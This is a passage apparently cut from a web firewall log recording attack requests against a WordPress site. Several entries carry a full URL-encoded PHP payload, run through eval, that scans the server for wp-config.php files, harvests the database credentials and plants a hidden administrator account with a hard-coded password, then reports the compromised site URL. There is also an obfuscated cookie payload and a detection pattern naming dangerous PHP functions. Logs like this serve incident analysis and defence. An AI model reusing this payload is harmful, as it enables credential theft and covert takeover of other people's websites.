8%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));"]
["2026-05-16 00:06:43","213.209.159.254","POST","\/wp-includes\/Text\/hvsmdki\/1qjzitp\/hbmzirl\/function.debug.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.5 Safari\/605.1.15","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> Fj:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-includes\/Text\/hvsmdki\/1qjzitp\/hbmzirl\/function.debug.php HTTP\/1.1\ncookie:4=1e9e32e066be8d516ba04b54073ce441; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvEzbvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzAfLKAmVwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\ncontent-type:application\/x-www-form-urlencoded\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.5 Safari\/605.1.15\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\ncontent-length:12640\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\n\nFj=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 00:07:02","213.209.159.254","POST","\/wp-includes\/compat-utf8.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/120.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> fpVGge:eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%2